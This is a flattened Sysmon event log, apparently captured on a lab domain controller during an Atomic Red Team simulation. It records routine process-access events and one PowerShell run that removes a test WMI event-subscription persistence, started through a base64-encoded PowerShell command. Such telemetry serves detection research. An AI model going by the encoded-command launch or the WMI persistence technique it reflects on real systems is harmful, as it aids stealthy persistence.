13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-85A7-5FCF-F700-000000009101}8164316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662527a8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625261c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662d4e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6624b204(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d04677(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662804d6(wow64) 154100x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.271{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \""Name = 'AtomicRedTeam-WMIPersistence-Example'\"" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \""Name = 'AtomicRedTeam-WMIPersistence-Example'\"" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \""REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding\"" -ErrorAction SilentlyContinue $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbABlAGEAbgB1AHAA 11241100x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2020-12-08 13:54:43.861 11241100x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2020-12-08 13:54:43.861 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:57.211{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:57.211{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:57.210{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd69-0xb68f3e03) 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:12.540{10ACEC4A-8546-5FCF-2300-000000009101}30163032C:\Windows\servicing\TrustedInstaller.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.798{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.798{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.735{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.735{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.657{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.657{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.657{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.579{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.579{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.517{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:22.470{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 